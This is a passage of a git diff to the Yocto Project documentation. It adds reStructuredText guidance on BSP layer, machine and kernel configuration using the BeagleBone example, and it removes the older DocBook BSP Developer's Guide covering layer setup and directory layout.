+ LAYERVERSION_yoctobsp = "4"
+ LAYERSERIES_COMPAT_yoctobsp = "&DISTRO_NAME_NO_CAP;"
+
+The variables used in this file configure the layer. A good way to learn about layer
+configuration files is to examine various files for BSP from the
+:yocto_git:`Source Repositories <>`.
+
+For a detailed description of this particular layer configuration file,
+see ":ref:`step 3 <dev-manual/dev-manual-common-tasks:creating your own layer>`"
+in the discussion that describes how to create layers in the Yocto
+Project Development Tasks Manual.
+
+BSP Machine Configuration Example
+---------------------------------
+
+As mentioned earlier in this section, the existence of a machine
+configuration file is what makes a layer a BSP layer as compared to a
+general or kernel layer.
+
+One or more machine configuration files exist in the
+``bsp_layer/conf/machine/`` directory of the layer: ::
+
+ bsp_layer/conf/machine/machine1\.conf
+ bsp_layer/conf/machine/machine2\.conf
+ bsp_layer/conf/machine/machine3\.conf
+ ... more ...
+
+For example, the machine configuration file for the `BeagleBone and
+BeagleBone Black development boards <https://beagleboard.org/bone>`__ is
+located in the layer ``poky/meta-yocto-bsp/conf/machine`` and is named
+``beaglebone-yocto.conf``: ::
+
+ #@TYPE: Machine
+ #@NAME: Beaglebone-yocto machine
+ #@DESCRIPTION: Reference machine configuration for http://beagleboard.org/bone and http://beagleboard.org/black boards
+
+ PREFERRED_PROVIDER_virtual/xserver ?= "xserver-xorg"
+ XSERVER ?= "xserver-xorg \
+ xf86-video-modesetting \
+ "
+
+ MACHINE_EXTRA_RRECOMMENDS = "kernel-modules kernel-devicetree"
+
+ EXTRA_IMAGEDEPENDS += "u-boot"
+
+ DEFAULTTUNE ?= "cortexa8hf-neon"
+ include conf/machine/include/tune-cortexa8.inc
+
+ IMAGE_FSTYPES += "tar.bz2 jffs2 wic wic.bmap"
+ EXTRA_IMAGECMD_jffs2 = "-lnp "
+ WKS_FILE ?= "beaglebone-yocto.wks"
+ IMAGE_INSTALL_append = " kernel-devicetree kernel-image-zimage"
+ do_image_wic[depends] += "mtools-native:do_populate_sysroot dosfstools-native:do_populate_sysroot"
+
+ SERIAL_CONSOLES ?= "115200;ttyS0 115200;ttyO0"
+ SERIAL_CONSOLES_CHECK = "${SERIAL_CONSOLES}"
+
+ PREFERRED_PROVIDER_virtual/kernel ?= "linux-yocto"
+ PREFERRED_VERSION_linux-yocto ?= "5.0%"
+
+ KERNEL_IMAGETYPE = "zImage"
+ KERNEL_DEVICETREE = "am335x-bone.dtb am335x-boneblack.dtb am335x-bonegreen.dtb"
+ KERNEL_EXTRA_ARGS += "LOADADDR=${UBOOT_ENTRYPOINT}"
+
+ SPL_BINARY = "MLO"
+ UBOOT_SUFFIX = "img"
+ UBOOT_MACHINE = "am335x_evm_defconfig"
+ UBOOT_ENTRYPOINT = "0x80008000"
+ UBOOT_LOADADDRESS = "0x80008000"
+
+ MACHINE_FEATURES = "usbgadget usbhost vfat alsa"
+
+ IMAGE_BOOT_FILES ?= "u-boot.${UBOOT_SUFFIX} MLO zImage am335x-bone.dtb am335x-boneblack.dtb am335x-bonegreen.dtb"
+
+The variables used to configure the machine define machine-specific properties; for
+example, machine-dependent packages, machine tunings, the type of kernel
+to build, and U-Boot configurations.
+
+The following list provides some explanation for the statements found in
+the example reference machine configuration file for the BeagleBone
+development boards. Realize that much more can be defined as part of a
+machine's configuration file. In general, you can learn about related
+variables that this example does not have by locating the variables in
+the ":ref:`ref-manual/ref-variables:variables glossary`" in the Yocto
+Project Reference Manual.
+
+- :term:`PREFERRED_PROVIDER_virtual/xserver <PREFERRED_PROVIDER>`:
+ The recipe that provides "virtual/xserver" when more than one
+ provider is found. In this case, the recipe that provides
+ "virtual/xserver" is "xserver-xorg", which exists in
+ ``poky/meta/recipes-graphics/xorg-xserver``.
+
+- :term:`XSERVER`: The packages that
+ should be installed to provide an X server and drivers for the
+ machine. In this example, the "xserver-xorg" and
+ "xf86-video-modesetting" are installed.
+
+- :term:`MACHINE_EXTRA_RRECOMMENDS`:
+ A list of machine-dependent packages not essential for booting the
+ image. Thus, the build does not fail if the packages do not exist.
+ However, the packages are required for a fully-featured image.
+
+ .. tip::
+
+ Many ``MACHINE*`` variables exist that help you configure a particular piece
+ of hardware.
+
+- :term:`EXTRA_IMAGEDEPENDS`:
+ Recipes to build that do not provide packages for installing into the
+ root filesystem but building the image depends on the recipes.
+ Sometimes a recipe is required to build the final image but is not
+ needed in the root filesystem. In this case, the U-Boot recipe must
+ be built for the image.
+
+- :term:`DEFAULTTUNE`: Machines
+ use tunings to optimize machine, CPU, and application performance.
+ These features, which are collectively known as "tuning features",
+ exist in the :term:`OpenEmbedded-Core (OE-Core)` layer (e.g.
+ ``poky/meta/conf/machine/include``). In this example, the default
+ tuning file is "cortexa8hf-neon".
+
+ .. note::
+
+ The include statement that pulls in the
+ ``conf/machine/include/tune-cortexa8.inc`` file provides many tuning
+ possibilities.
+
+- :term:`IMAGE_FSTYPES`: The
+ formats the OpenEmbedded build system uses during the build when
+ creating the root filesystem. In this example, four types of images
+ are supported.
+
+- :term:`EXTRA_IMAGECMD`:
+ Specifies additional options for image creation commands. In this
+ example, the "-lnp " option is used when creating the
+ `JFFS2 <https://en.wikipedia.org/wiki/JFFS2>`__ image.
+
+- :term:`WKS_FILE`: The location of
+ the :ref:`Wic kickstart <ref-manual/ref-kickstart:openembedded kickstart (\`\`.wks\`\`) reference>` file used
+ by the OpenEmbedded build system to create a partitioned image
+ (image.wic).
+
+- :term:`IMAGE_INSTALL`:
+ Specifies packages to install into an image through the
+ :ref:`image <ref-classes-image>` class. Recipes
+ use the ``IMAGE_INSTALL`` variable.
+
+- ``do_image_wic[depends]``: A task that is constructed during the
+ build. In this example, the task depends on specific tools in order
+ to create the sysroot when building a Wic image.
+
+- :term:`SERIAL_CONSOLES`:
+ Defines a serial console (TTY) to enable using getty. In this case,
+ the baud rate is "115200" and the device name is "ttyO0".
+
+- :term:`PREFERRED_PROVIDER_virtual/kernel <PREFERRED_PROVIDER>`:
+ Specifies the recipe that provides "virtual/kernel" when more than
+ one provider is found. In this case, the recipe that provides
+ "virtual/kernel" is "linux-yocto", which exists in the layer's
+ ``recipes-kernel/linux`` directory.
+
+- :term:`PREFERRED_VERSION_linux-yocto <PREFERRED_VERSION>`:
+ Defines the version of the recipe used to build the kernel, which is
+ "5.0" in this case.
+
+- :term:`KERNEL_IMAGETYPE`:
+ The type of kernel to build for the device. In this case, the
+ OpenEmbedded build system creates a "zImage" image type.
+
+- :term:`KERNEL_DEVICETREE`:
+ The names of the generated Linux kernel device trees (i.e. the
+ ``*.dtb``) files. All the device trees for the various BeagleBone
+ devices are included.
+
+- :term:`KERNEL_EXTRA_ARGS`:
+ Additional ``make`` command-line arguments the OpenEmbedded build
+ system passes on when compiling the kernel. In this example,
+ ``LOADADDR=${UBOOT_ENTRYPOINT}`` is passed as a command-line argument.
+
+- :term:`SPL_BINARY`: Defines the
+ Secondary Program Loader (SPL) binary type. In this case, the SPL
+ binary is set to "MLO", which stands for Multimedia card LOader.
+
+ The BeagleBone development board requires an SPL to boot and that SPL
+ file type must be MLO. Consequently, the machine configuration needs
+ to define ``SPL_BINARY`` as ``MLO``.
+
+ .. note::
+
+ For more information on how the SPL variables are used, see the
+ :yocto_git:`u-boot.inc </cgit/cgit.cgi/poky/tree/meta/recipes-bsp/u-boot/u-boot.inc>`
+ include file.
+
+- :term:`UBOOT_* <UBOOT_ENTRYPOINT>`: Defines
+ various U-Boot configurations needed to build a U-Boot image. In this
+ example, a U-Boot image is required to boot the BeagleBone device.
+ See the following variables for more information:
+
+ - :term:`UBOOT_SUFFIX`:
+ Points to the generated U-Boot extension.
+
+ - :term:`UBOOT_MACHINE`:
+ Specifies the value passed on the make command line when building
+ a U-Boot image.
+
+ - :term:`UBOOT_ENTRYPOINT`:
+ Specifies the entry point for the U-Boot image.
+
+ - :term:`UBOOT_LOADADDRESS`:
+ Specifies the load address for the U-Boot image.
+
+- :term:`MACHINE_FEATURES`:
+ Specifies the list of hardware features the BeagleBone device is
+ capable of supporting. In this case, the device supports "usbgadget
+ usbhost vfat alsa".
+
+- :term:`IMAGE_BOOT_FILES`:
+ Files installed into the device's boot partition when preparing the
+ image using the Wic tool with the ``bootimg-partition`` or
+ ``bootimg-efi`` source plugin.
+
+BSP Kernel Recipe Example
+-------------------------
+
+The kernel recipe used to build the kernel image for the BeagleBone
+device was established in the machine configuration: ::
+
+ PREFERRED_PROVIDER_virtual/kernel ?= "linux-yocto"
+ PREFERRED_VERSION_linux-yocto ?= "5.0%"
+
+The ``meta-yocto-bsp/recipes-kernel/linux`` directory in the layer contains
+metadata used to build the kernel. In this case, a kernel append file
+(i.e. ``linux-yocto_5.0.bbappend``) is used to override an established
+kernel recipe (i.e. ``linux-yocto_5.0.bb``), which is located in
+:yocto_git:`/cgit/cgit.cgi/poky/tree/meta/recipes-kernel/linux`.
+
+Following is the contents of the append file: ::
+
+ KBRANCH_genericx86 = "v5.0/standard/base"
+ KBRANCH_genericx86-64 = "v5.0/standard/base"
+ KBRANCH_edgerouter = "v5.0/standard/edgerouter"
+ KBRANCH_beaglebone-yocto = "v5.0/standard/beaglebone"
+
+ KMACHINE_genericx86 ?= "common-pc"
+ KMACHINE_genericx86-64 ?= "common-pc-64"
+ KMACHINE_beaglebone-yocto ?= "beaglebone"
+
+ SRCREV_machine_genericx86 ?= "3df4aae6074e94e794e27fe7f17451d9353cdf3d"
+ SRCREV_machine_genericx86-64 ?= "3df4aae6074e94e794e27fe7f17451d9353cdf3d"
+ SRCREV_machine_edgerouter ?= "3df4aae6074e94e794e27fe7f17451d9353cdf3d"
+ SRCREV_machine_beaglebone-yocto ?= "3df4aae6074e94e794e27fe7f17451d9353cdf3d"
+
+ COMPATIBLE_MACHINE_genericx86 = "genericx86"
+ COMPATIBLE_MACHINE_genericx86-64 = "genericx86-64"
+ COMPATIBLE_MACHINE_edgerouter = "edgerouter"
+ COMPATIBLE_MACHINE_beaglebone-yocto = "beaglebone-yocto"
+
+ LINUX_VERSION_genericx86 = "5.0.3"
+ LINUX_VERSION_genericx86-64 = "5.0.3"
+ LINUX_VERSION_edgerouter = "5.0.3"
+ LINUX_VERSION_beaglebone-yocto = "5.0.3"
+
+This particular append file works for all the machines that are
+part of the ``meta-yocto-bsp`` layer. The relevant statements are
+appended with the "beaglebone-yocto" string. The OpenEmbedded build
+system uses these statements to override similar statements in the
+kernel recipe:
+
+- :term:`KBRANCH`: Identifies the
+ kernel branch that is validated, patched, and configured during the
+ build.
+
+- :term:`KMACHINE`: Identifies the
+ machine name as known by the kernel, which is sometimes a different
+ name than what is known by the OpenEmbedded build system.
+
+- :term:`SRCREV`: Identifies the
+ revision of the source code used to build the image.
+
+- :term:`COMPATIBLE_MACHINE`:
+ A regular expression that resolves to one or more target machines
+ with which the recipe is compatible.
+
+- :term:`LINUX_VERSION`: The
+ Linux version from kernel.org used by the OpenEmbedded build system
+ to build the kernel image.
diff --git a/documentation/bsp-guide/bsp.xml b/documentation/bsp-guide/bsp.xml
deleted file mode 100644
index 96c0455f67..0000000000
--- a/documentation/bsp-guide/bsp.xml
+++ /dev/null
@@ -1,2258 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='bsp'>
-
-<title>Board Support Packages (BSP) - Developer's Guide</title>
-
-<para>
- A Board Support Package (BSP) is a collection of information that
- defines how to support a particular hardware device, set of devices, or
- hardware platform.
- The BSP includes information about the hardware features
- present on the device and kernel configuration information along with any
- additional hardware drivers required.
- The BSP also lists any additional software
- components required in addition to a generic Linux software stack for both
- essential and optional platform features.
-</para>
-
-<para>
- This guide presents information about BSP layers, defines a structure for components
- so that BSPs follow a commonly understood layout, discusses how to customize
- a recipe for a BSP, addresses BSP licensing, and provides information that
- shows you how to create a
- <link linkend='bsp-layers'>BSP Layer</link> using the
- <link linkend='creating-a-new-bsp-layer-using-the-bitbake-layers-script'><filename>bitbake-layers</filename></link>
- tool.
-</para>
-
-<section id='bsp-layers'>
- <title>BSP Layers</title>
-
- <para>
- A BSP consists of a file structure inside a base directory.
- Collectively, you can think of the base directory, its file structure,
- and the contents as a <firstterm>BSP layer</firstterm>.
- Although not a strict requirement, BSP layers in the Yocto Project
- use the following well-established naming convention:
- <literallayout class='monospaced'>
- meta-<replaceable>bsp_root_name</replaceable>
- </literallayout>
- The string "meta-" is prepended to the machine or platform name, which is
- <replaceable>bsp_root_name</replaceable> in the above form.
- <note><title>Tip</title>
- Because the BSP layer naming convention is well-established,
- it is advisable to follow it when creating layers.
- Technically speaking, a BSP layer name does not need to
- start with <filename>meta-</filename>.
- However, various scripts and tools in the Yocto Project
- development environment assume this convention.
- </note>
- </para>
-
- <para>
- To help understand the BSP layer concept, consider the BSPs that the
- Yocto Project supports and provides with each release.
- You can see the layers in the
- <ulink url='&YOCTO_DOCS_OM_URL;#yocto-project-repositories'>Yocto Project Source Repositories</ulink>
- through a web interface at
- <ulink url='&YOCTO_GIT_URL;'></ulink>.
- If you go to that interface, you will find a list of repositories
- under "Yocto Metadata Layers".
- <note>
- Layers that are no longer actively supported as part of the
- Yocto Project appear under the heading "Yocto Metadata Layer
- Archive."
- </note>
- Each repository is a BSP layer supported by the Yocto Project
- (e.g. <filename>meta-raspberrypi</filename> and
- <filename>meta-intel</filename>).
- Each of these layers is a repository unto itself and clicking on
- the layer name displays two URLs from which you can
- clone the layer's repository to your local system.
- Here is an example that clones the Raspberry Pi BSP layer:
- <literallayout class='monospaced'>
- $ git clone git://git.yoctoproject.org/meta-raspberrypi
- </literallayout>
- </para>
-
- <para>
- In addition to BSP layers, the
- <filename>meta-yocto-bsp</filename> layer is part of the
- shipped <filename>poky</filename> repository.
- The <filename>meta-yocto-bsp</filename> layer maintains several
- "reference" BSPs including the ARM-based Beaglebone, MIPS-based
- EdgeRouter, and generic versions of
- both 32-bit and 64-bit IA machines.
- </para>
-
- <para>
- For information on typical BSP development workflow, see the
- "<link linkend='developing-a-board-support-package-bsp'>Developing a Board Support Package (BSP)</link>"
- section.
- For more information on how to set up a local copy of source files
- from a Git repository, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#locating-yocto-project-source-files'>Locating Yocto Project Source Files</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
-
- <para>
- The BSP layer's base directory
- (<filename>meta-<replaceable>bsp_root_name</replaceable></filename>)
- is the root directory of that Layer.
- This directory is what you add to the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BBLAYERS'><filename>BBLAYERS</filename></ulink>
- variable in the <filename>conf/bblayers.conf</filename> file found in your
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>,
- which is established after you run the OpenEmbedded build environment
- setup script (i.e.
- <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>).
- Adding the root directory allows the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>
- to recognize the BSP layer and from it build an image.
- Here is an example:
- <literallayout class='monospaced'>
- BBLAYERS ?= " \
- /usr/local/src/yocto/meta \
- /usr/local/src/yocto/meta-poky \
- /usr/local/src/yocto/meta-yocto-bsp \
- /usr/local/src/yocto/meta-mylayer \
- "
- </literallayout>
- <note><title>Tip</title>
- Ordering and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BBFILE_PRIORITY'><filename>BBFILE_PRIORITY</filename></ulink>
- for the layers listed in <filename>BBLAYERS</filename>
- matter.
- For example, if multiple layers define a machine
- configuration, the OpenEmbedded build system uses
- the last layer searched given similar layer
- priorities.
- The build system works from the top-down through
- the layers listed in <filename>BBLAYERS</filename>.
- </note>
- </para>
-
- <para>
- Some BSPs require or depend on additional layers
- beyond the BSP's root layer in order to be functional.
- In this case, you need to specify these layers in the
- <filename>README</filename> "Dependencies" section of the
- BSP's root layer.
- Additionally, if any build instructions exist for the
- BSP, you must add them to the "Dependencies" section.
- </para>
-
- <para>
- Some layers function as a layer to hold other BSP layers.
- These layers are knows as
- "<ulink url='&YOCTO_DOCS_REF_URL;#term-container-layer'>container layers</ulink>".
- An example of this type of layer is OpenEmbedded's
- <ulink url='https://github.com/openembedded/meta-openembedded'><filename>meta-openembedded</filename></ulink>
- layer.
- The <filename>meta-openembedded</filename> layer contains
- many <filename>meta-*</filename> layers.
- In cases like this, you need to include the names of the actual
- layers you want to work with, such as:
- <literallayout class='monospaced'>
- BBLAYERS ?= " \
- /usr/local/src/yocto/meta \
- /usr/local/src/yocto/meta-poky \
- /usr/local/src/yocto/meta-yocto-bsp \
- /usr/local/src/yocto/meta-mylayer \
- .../meta-openembedded/meta-oe \
- .../meta-openembedded/meta-perl \
- .../meta-openembedded/meta-networking \
- "
- </literallayout>
- and so on.
- </para>
-
- <para>
- For more information on layers, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
- section of the Yocto Project Development Tasks Manual.
- </para>
-</section>
-
-<section id='preparing-your-build-host-to-work-with-bsp-layers'>
- <title>Preparing Your Build Host to Work With BSP Layers</title>
-
- <para>
- This section describes how to get your build host ready
- to work with BSP layers.
- Once you have the host set up, you can create the layer
- as described in the
- "<link linkend='creating-a-new-bsp-layer-using-the-bitbake-layers-script'>Creating a new BSP Layer Using the <filename>bitbake-layers</filename> Script</link>"
- section.
- <note>
- For structural information on BSPs, see the
- <link linkend='bsp-filelayout'>Example Filesystem Layout</link>
- section.
- </note>
- <orderedlist>
- <listitem><para>
- <emphasis>Set Up the Build Environment:</emphasis>
- Be sure you are set up to use BitBake in a shell.
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-preparing-the-build-host'>Preparing the Build Host</ulink>"
- section in the Yocto Project Development Tasks Manual for information
- on how to get a build host ready that is either a native
- Linux machine or a machine that uses CROPS.
- </para></listitem>
- <listitem><para>
- <emphasis>Clone the <filename>poky</filename> Repository:</emphasis>
- You need to have a local copy of the Yocto Project
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- (i.e. a local <filename>poky</filename> repository).
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#cloning-the-poky-repository'>Cloning the <filename>poky</filename> Repository</ulink>"
- and possibly the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#checking-out-by-branch-in-poky'>Checking Out by Branch in Poky</ulink>"
- or
- "<ulink url='&YOCTO_DOCS_DEV_URL;#checkout-out-by-tag-in-poky'>Checking Out by Tag in Poky</ulink>"
- sections all in the Yocto Project Development Tasks Manual for
- information on how to clone the <filename>poky</filename>
- repository and check out the appropriate branch for your work.
- </para></listitem>
- <listitem><para>
- <emphasis>Determine the BSP Layer You Want:</emphasis>
- The Yocto Project supports many BSPs, which are maintained in
- their own layers or in layers designed to contain several
- BSPs.
- To get an idea of machine support through BSP layers, you can
- look at the
- <ulink url='&YOCTO_RELEASE_DL_URL;/machines'>index of machines</ulink>
- for the release.
- </para></listitem>
- <listitem><para>
- <emphasis>Optionally Clone the
- <filename>meta-intel</filename> BSP Layer:</emphasis>
- If your hardware is based on current Intel CPUs and devices,
- you can leverage this BSP layer.
- For details on the <filename>meta-intel</filename> BSP layer,
- see the layer's
- <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/meta-intel/tree/README'><filename>README</filename></ulink>
- file.
- <orderedlist>
- <listitem><para>
- <emphasis>Navigate to Your Source Directory:</emphasis>
- Typically, you set up the
- <filename>meta-intel</filename> Git repository
- inside the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- (e.g. <filename>poky</filename>).
- <literallayout class='monospaced'>
- $ cd /home/<replaceable>you</replaceable>/poky
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Clone the Layer:</emphasis>
- <literallayout class='monospaced'>
- $ git clone git://git.yoctoproject.org/meta-intel.git
- Cloning into 'meta-intel'...
- remote: Counting objects: 15585, done.
- remote: Compressing objects: 100% (5056/5056), done.
- remote: Total 15585 (delta 9123), reused 15329 (delta 8867)
- Receiving objects: 100% (15585/15585), 4.51 MiB | 3.19 MiB/s, done.
- Resolving deltas: 100% (9123/9123), done.
- Checking connectivity... done.
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Check Out the Proper Branch:</emphasis>
- The branch you check out for
- <filename>meta-intel</filename> must match the same
- branch you are using for the Yocto Project release
- (e.g. &DISTRO_NAME_NO_CAP;):
- <literallayout class='monospaced'>
- $ cd meta-intel
- $ git checkout -b &DISTRO_NAME_NO_CAP; remotes/origin/&DISTRO_NAME_NO_CAP;
- Branch &DISTRO_NAME_NO_CAP; set up to track remote branch &DISTRO_NAME_NO_CAP; from origin.
- Switched to a new branch '&DISTRO_NAME_NO_CAP;'
- </literallayout>
- <note>
- To see the available branch names in a cloned repository,
- use the <filename>git branch -al</filename> command.
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#checking-out-by-branch-in-poky'>Checking Out By Branch in Poky</ulink>"
- section in the Yocto Project Development Tasks
- Manual for more information.
- </note>
- </para></listitem>
- </orderedlist>
- </para></listitem>
- <listitem><para>
- <emphasis>Optionally Set Up an Alternative BSP Layer:</emphasis>
- If your hardware can be more closely leveraged to an
- existing BSP not within the <filename>meta-intel</filename>
- BSP layer, you can clone that BSP layer.</para>
-
- <para>The process is identical to the process used for the
- <filename>meta-intel</filename> layer except for the layer's
- name.
- For example, if you determine that your hardware most
- closely matches the <filename>meta-raspberrypi</filename>,
- clone that layer:
- <literallayout class='monospaced'>
- $ git clone git://git.yoctoproject.org/meta-raspberrypi
- Cloning into 'meta-raspberrypi'...
- remote: Counting objects: 4743, done.
- remote: Compressing objects: 100% (2185/2185), done.
- remote: Total 4743 (delta 2447), reused 4496 (delta 2258)
- Receiving objects: 100% (4743/4743), 1.18 MiB | 0 bytes/s, done.
- Resolving deltas: 100% (2447/2447), done.
- Checking connectivity... done.
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Initialize the Build Environment:</emphasis>
- While in the root directory of the Source Directory (i.e.
- <filename>poky</filename>), run the
- <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>
- environment setup script to define the OpenEmbedded
- build environment on your build host.
- <literallayout class='monospaced'>
- $ source &OE_INIT_FILE;
- </literallayout>
- Among other things, the script creates the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>,
- which is <filename>build</filename> in this case
- and is located in the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
- After the script runs, your current working directory
- is set to the <filename>build</filename> directory.
- </para></listitem>
- </orderedlist>
- </para>
-</section>
-
-<section id="bsp-filelayout">
- <title>Example Filesystem Layout</title>
-
- <para>
- Defining a common BSP directory structure allows
- end-users to understand and become familiar with
- that standard.
- A common format also encourages standardization
- of software support for hardware.
- </para>
-
- <para>
- The proposed form described in this section does
- have elements that are specific to the OpenEmbedded
- build system.
- It is intended that developers can use this structure
- with other build systems besides the OpenEmbedded build
- system.
- It is also intended that it will be be simple to extract
- information and convert it to other formats if required.
- The OpenEmbedded build system, through its standard
- <ulink url='&YOCTO_DOCS_OM_URL;#the-yocto-project-layer-model'>layers mechanism</ulink>,
- can directly accept the format described as a layer.
- The BSP layer captures all the hardware-specific details
- in one place using a standard format, which is useful
- for any person wishing to use the hardware platform
- regardless of the build system they are using.
- </para>
-
- <para>
- The BSP specification does not include a build system
- or other tools - the specification is concerned with
- the hardware-specific components only.
- At the end-distribution point, you can ship the BSP
- layer combined with a build system and other tools.
- Realize that it is important to maintain the distinction
- that the BSP layer, a build system, and tools are
- separate components that could be combined in
- certain end products.
- </para>
-
- <para>
- Before looking at the recommended form for the directory structure
- inside a BSP layer, you should be aware that some
- requirements do exist in order for a BSP layer to
- be considered <firstterm>compliant</firstterm> with the Yocto Project.
- For that list of requirements, see the
- "<link linkend='released-bsp-requirements'>Released BSP Requirements</link>"
- section.
- </para>
-
- <para>
- Below is the typical directory structure for a BSP layer.
- While this basic form represents the standard,
- realize that the actual layout for individual
- BSPs could differ.
- <literallayout class='monospaced'>
- meta-<replaceable>bsp_root_name</replaceable>/
- meta-<replaceable>bsp_root_name</replaceable>/<replaceable>bsp_license_file</replaceable>
- meta-<replaceable>bsp_root_name</replaceable>/README
- meta-<replaceable>bsp_root_name</replaceable>/README.sources
- meta-<replaceable>bsp_root_name</replaceable>/binary/<replaceable>bootable_images</replaceable>
- meta-<replaceable>bsp_root_name</replaceable>/conf/layer.conf
- meta-<replaceable>bsp_root_name</replaceable>/conf/machine/*.conf
- meta-<replaceable>bsp_root_name</replaceable>/recipes-bsp/*
- meta-<replaceable>bsp_root_name</replaceable>/recipes-core/*
- meta-<replaceable>bsp_root_name</replaceable>/recipes-graphics/*
- meta-<replaceable>bsp_root_name</replaceable>/recipes-kernel/linux/linux-yocto_<replaceable>kernel_rev</replaceable>.bbappend
- </literallayout>
- </para>
-
- <para>
- Below is an example of the Raspberry Pi BSP
- layer that is available from the
- <ulink url='&YOCTO_GIT_URL;'>Source Respositories</ulink>:
- <literallayout class='monospaced'>
- meta-raspberrypi/COPYING.MIT
- meta-raspberrypi/README.md
- meta-raspberrypi/classes
- meta-raspberrypi/classes/sdcard_image-rpi.bbclass
- meta-raspberrypi/conf/
- meta-raspberrypi/conf/layer.conf
- meta-raspberrypi/conf/machine/
- meta-raspberrypi/conf/machine/raspberrypi-cm.conf
- meta-raspberrypi/conf/machine/raspberrypi-cm3.conf
- meta-raspberrypi/conf/machine/raspberrypi.conf
- meta-raspberrypi/conf/machine/raspberrypi0-wifi.conf
- meta-raspberrypi/conf/machine/raspberrypi0.conf
- meta-raspberrypi/conf/machine/raspberrypi2.conf
- meta-raspberrypi/conf/machine/raspberrypi3-64.conf
- meta-raspberrypi/conf/machine/raspberrypi3.conf
- meta-raspberrypi/conf/machine/include
- meta-raspberrypi/conf/machine/include/rpi-base.inc
- meta-raspberrypi/conf/machine/include/rpi-default-providers.inc
- meta-raspberrypi/conf/machine/include/rpi-default-settings.inc
- meta-raspberrypi/conf/machine/include/rpi-default-versions.inc
- meta-raspberrypi/conf/machine/include/tune-arm1176jzf-s.inc
- meta-raspberrypi/docs
- meta-raspberrypi/docs/Makefile
- meta-raspberrypi/docs/conf.py
- meta-raspberrypi/docs/contributing.md
- meta-raspberrypi/docs/extra-apps.md
- meta-raspberrypi/docs/extra-build-config.md
- meta-raspberrypi/docs/index.rst
- meta-raspberrypi/docs/layer-contents.md
- meta-raspberrypi/docs/readme.md
- meta-raspberrypi/files
- meta-raspberrypi/files/custom-licenses
- meta-raspberrypi/files/custom-licenses/Broadcom
- meta-raspberrypi/recipes-bsp
- meta-raspberrypi/recipes-bsp/bootfiles
- meta-raspberrypi/recipes-bsp/bootfiles/bcm2835-bootfiles.bb
- meta-raspberrypi/recipes-bsp/bootfiles/rpi-config_git.bb
- meta-raspberrypi/recipes-bsp/common
- meta-raspberrypi/recipes-bsp/common/firmware.inc
- meta-raspberrypi/recipes-bsp/formfactor
- meta-raspberrypi/recipes-bsp/formfactor/formfactor
- meta-raspberrypi/recipes-bsp/formfactor/formfactor/raspberrypi
- meta-raspberrypi/recipes-bsp/formfactor/formfactor/raspberrypi/machconfig
- meta-raspberrypi/recipes-bsp/formfactor/formfactor_0.0.bbappend
- meta-raspberrypi/recipes-bsp/rpi-u-boot-src
- meta-raspberrypi/recipes-bsp/rpi-u-boot-src/files
- meta-raspberrypi/recipes-bsp/rpi-u-boot-src/files/boot.cmd.in
- meta-raspberrypi/recipes-bsp/rpi-u-boot-src/rpi-u-boot-scr.bb
- meta-raspberrypi/recipes-bsp/u-boot
- meta-raspberrypi/recipes-bsp/u-boot/u-boot
- meta-raspberrypi/recipes-bsp/u-boot/u-boot/*.patch
- meta-raspberrypi/recipes-bsp/u-boot/u-boot_%.bbappend
- meta-raspberrypi/recipes-connectivity
- meta-raspberrypi/recipes-connectivity/bluez5
- meta-raspberrypi/recipes-connectivity/bluez5/bluez5
- meta-raspberrypi/recipes-connectivity/bluez5/bluez5/*.patch
- meta-raspberrypi/recipes-connectivity/bluez5/bluez5/BCM43430A1.hcd
- meta-raspberrypi/recipes-connectivity/bluez5/bluez5brcm43438.service
- meta-raspberrypi/recipes-connectivity/bluez5/bluez5_%.bbappend
- meta-raspberrypi/recipes-core
- meta-raspberrypi/recipes-core/images
- meta-raspberrypi/recipes-core/images/rpi-basic-image.bb
- meta-raspberrypi/recipes-core/images/rpi-hwup-image.bb
- meta-raspberrypi/recipes-core/images/rpi-test-image.bb
- meta-raspberrypi/recipes-core/packagegroups
- meta-raspberrypi/recipes-core/packagegroups/packagegroup-rpi-test.bb
- meta-raspberrypi/recipes-core/psplash
- meta-raspberrypi/recipes-core/psplash/files
- meta-raspberrypi/recipes-core/psplash/files/psplash-raspberrypi-img.h
- meta-raspberrypi/recipes-core/psplash/psplash_git.bbappend
- meta-raspberrypi/recipes-core/udev
- meta-raspberrypi/recipes-core/udev/udev-rules-rpi
- meta-raspberrypi/recipes-core/udev/udev-rules-rpi/99-com.rules
- meta-raspberrypi/recipes-core/udev/udev-rules-rpi.bb
- meta-raspberrypi/recipes-devtools
- meta-raspberrypi/recipes-devtools/bcm2835
- meta-raspberrypi/recipes-devtools/bcm2835/bcm2835_1.52.bb
- meta-raspberrypi/recipes-devtools/pi-blaster
- meta-raspberrypi/recipes-devtools/pi-blaster/files
- meta-raspberrypi/recipes-devtools/pi-blaster/files/*.patch
- meta-raspberrypi/recipes-devtools/pi-blaster/pi-blaster_git.bb
- meta-raspberrypi/recipes-devtools/python
